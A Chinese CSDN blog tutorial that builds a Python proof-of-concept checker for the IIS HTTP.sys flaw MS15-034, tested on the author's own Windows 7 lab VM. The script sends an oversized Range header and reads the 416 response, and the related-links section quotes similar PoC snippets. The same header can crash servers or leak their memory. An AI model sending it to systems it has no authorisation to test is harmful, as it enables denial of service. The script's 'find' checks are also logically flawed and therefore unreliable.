python编写CVE-2015-1635(MS15-034) POC

最新推荐文章于 2022-12-21 11:06:11 发布
最新推荐文章于 2022-12-21 11:06:11 发布
阅读量466 收藏
点赞数
分类专栏: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50620293/article/details/116459982
版权

HTTP.sys远程代码执行(MS15-034) 。
这个洞是出现在Windows服务器上的,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。IIS版本为7.5或8.0

所以根据这个,用python写一个POC 为编写漏洞扫描器做做基础

做准备

在win7的虚拟机上,开启IIS,域名为192.168.17.130:7070
在这里插入图片描述
物理机上访问成功
在这里插入图片描述

写代码

原理就是使用requests对目标网址发送range的值为’bytes=0-18446744073709551615’的恶意请求包,然后看返回状态码是否为“416”以及“Requested Range Not Satisfiable”

  • 1

首先我们可以调用reqeuests.get(url).headers 查看目标服务器的信息。这个headers可以提取到很多有用信息。

url = "http://192.168.17.130:7070"
response = requests.get(url)
print(response.headers)

运行结果 可以看到版本信息为IIS7.5
在这里插入图片描述

  • 2
    发送请求包,看看响应体
#目标服务器版本是否为IIS7.5或8.0
if server.find("IIS/7.5") or server.find("IIS/8.0"):
    #开始检测
    payload = { 'Range':'bytes=0-18446744073709551615'}
    r = requests.get(url=url,headers=payload)
    print((r.content))

结果
在这里插入图片描述
这就证明了目标服务器存在ms15-034

  • 3
    看整体代码,标了注释,应该都可以看懂 我为了在burp中查看发送的请求包,所以加了代理
import requests

url = "http://192.168.17.130:7070"
response = requests.get(url)
server = response.headers['Server']

#设置代理,在burp上查看python发送出的请求包
proxies = {'http':'http://127.0.0.1:8080'}
#1.1.首先判断服务器是不是架设在windows服务器上的
if server.find("IIS/7.5") or server.find("IIS/8.0"):
    #开始检测
    payload = { 'Range':'bytes=0-18446744073709551615'}
    r = requests.get(url=url,headers=payload,proxies=proxies)
    #2.返回状态码“416”以及“Requested Range Not Satisfiable”证明存在漏洞
    if str(r.content).find("Requested Range Not Satisfiable") :
        if r.status_code == 416:
            print('this server exist ms15-034')
    else:
        print('this server not exist ms15-034')
else:
    print("Server is not IIS/7.5 or IIS/8.0")

运行一次,在burp中查看拦截的请求包
在这里插入图片描述
重放查看响应体
在这里插入图片描述
在这里插入图片描述
放包后
在这里插入图片描述

Hileaf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ms15_034漏洞poc脚本
洋洋的小黑屋
05-23 521
ms15_034漏洞poc脚本 环境python3编写的: # coding=utf-8 import requests url = "http://192.168.64.129:8001/" r = requests.get(url) print(r.headers) remote_server = r.headers["Server"] if remote_server.find('IIS/7.5') or remote_server.find('IIS/8.0'): payload = {'H
MS15-034 HTTP.sys 远程执行代码(CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
cve-2015-1635 poc
weixin_30929195的博客
04-17 451
1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0\r\n\r\n" 6 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-...
MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC
weixin_34059951的博客
09-12 821
检测脚本一: Python----beebeetohttp://www.beebeeto.com/pdb/poc-2015-0081/#!/usr/bin/envpython #coding=utf-8 """ Site:http://www.beebeeto.com/ Framework:https://github.com/n0tr00t/Beebeet...
MS15-034:POC MS15-034
06-09
这是针对以下内容的测试 POCMS15-034:HTTP.sys (IIS) DoS 和可能的远程代码执行。 作者:易卜拉欣 Hegazy @Zigoo0 要开始使用该工具,只需创建 list.txt 文件,并将您要测试的所有站点添加到该文件中。 你准备好了:) 该工具是用python编写的,如果你没有安装python,你可以从:python.org下载 安装后,启动该工具,输入 list.txt,该工具将处理其余的 :-) 特征: 1-可以扫描多个站点。 2- 支持 SSL 3-超级用户友好:D
MS15-034漏洞检测工具-PY脚本
04-18
IIS高风险漏洞MS15-034POC,可利用脚本检测漏洞是否存在。
CVE-2015-1635MS15-034(Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
在提供的压缩文件"CVE-2015-1701-master"中,可能包含了关于这个漏洞的详细分析、复现代码、PoC(Proof of Concept)或者缓解措施的研究报告。深入研究这些资料,可以帮助我们更好地理解和防止类似的漏洞攻击。
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试...
Python-CVE20165696的概念验证代码
08-12
CVE-2016-5696的概念验证代码
CVEs:Rhino Security Labs团队为各种CVE编写的概念验证漏洞脚本的集合
05-06
Rhino CVE概念验证漏洞 Rhino Security Labs的团队针对各种CVE编写的概念证明漏洞利用脚本的集合。 CVE-2018-1335:Apache Tika Server中的命令注入 CVE-2017-7279:Unitrends企业备份解决方案特权升级。 CVE-2017-7280:Unitrends企业备份解决方案命令执行 CVE-2017-7281:通过文件上传的Unitrends企业备份解决方案RCE CVE-2017-7282:Unitrends企业备份解决方案LFI CVE-2017-7283:通过Retore文件的Unitrends企业备份解决方案RCE CVE-2017-7284:在没有当前密码的情况下强制更改密码 CVE-2017-12860:Epson EasyMP Projector硬编码PIN CVE-2017-12861:Epson
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
MS15-034漏洞复现及python编写对应POC脚本
weixin_49340699的博客
07-29 1338
MS15-034漏洞复现及python编写对应POC脚本环境搭建编写python漏洞检测脚本总结 环境搭建 首先我们到官网查看对应漏洞的信息https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 可以得知该漏洞适用于很多环境我们这里就用win7来构建靶机环境 在win7安装ISS 勾选上图上两项 然后就开始安装了等待几分钟后(可能要重启) 验证安装成功否打开浏览器访问127.0.0.1 如图则安装
ms15-034漏洞影响linux,MS15-034:Microsoft Windows HTTP.sys 远程执行代码漏洞 【POC
weixin_42317885的博客
05-18 364
#!/usr/bin/pythonimport requestsimport sysurl = "http://"+sys.argv[1]r = requests.get(url)remote_server = r.headers['Server']if remote_server.find("IIS/7.5") or remote_server.find("IIS/8.0"):payload =...
HTTP.sys 远程执行代码漏洞(CVE-2015-1635)(MS15-034)简单测试
rigous的博客
03-08 1万+
        无意中用扫描器扫到了HTTP.sys 漏洞,因为之前写过pythonpoc脚本,感觉exp应该也是存在的。本着常识的心态找一下利用代码,如果能提权是再好不过的。    根据网上的记录,此漏洞利用最多的是导致蓝屏。RCE还无法找到,可能被大牛私藏了。由于会导致BSOD,所以只能在本地进行测试了。步骤如下:    1、环境搭建,由于本人的server只有2003,只能安装iis6.0...
网络空间安全——MS15_034漏洞验证与安全加固
Jay
12-21 1659
1.安装iis7.5,用127.0.0.1访问,将访问页面截图。4.将测试结果进行截图,判断是否存在ms15_034漏洞。3.调用msf相应的测试模块进行扫描,将测试模块截图。靶机:windows 2008 安装好iis7.5。5.使用拒绝服务模块,来进行测试,将模块名称截图。分析是否存在ms15_034漏洞,抓包验证截图。8.再次利用拒绝服务攻击,验证是否还存在漏洞。6.用拒绝服务模块进行攻击的结果进行截图。7.对靶机进行修补,将修补过程进行截图。2.用burpsuite。
CVE-2015-1635MS15-034 )远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
Python漏洞cve-2015-20107
最新发布
06-07
对于Python来说,CVE-2015-20107漏洞实际上是一个与Python中subprocess模块相关的漏洞。具体来说,当使用Python的subprocess模块执行命令时,如果存在特定的情况,攻击者可以通过构造特定的命令参数来执行恶意代码。这个漏洞本质上是由于subprocess模块在处理命令参数时没有正确地转义特殊字符所导致的。 需要注意的是,这个漏洞是由于subprocess模块的使用不当而导致的,而不是Python本身的缺陷。因此,开发人员在使用Python的subprocess模块时,需要注意正确地转义命令参数,以避免类似的安全问题。此外,Python官方也已经发布了修复该漏洞的补丁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值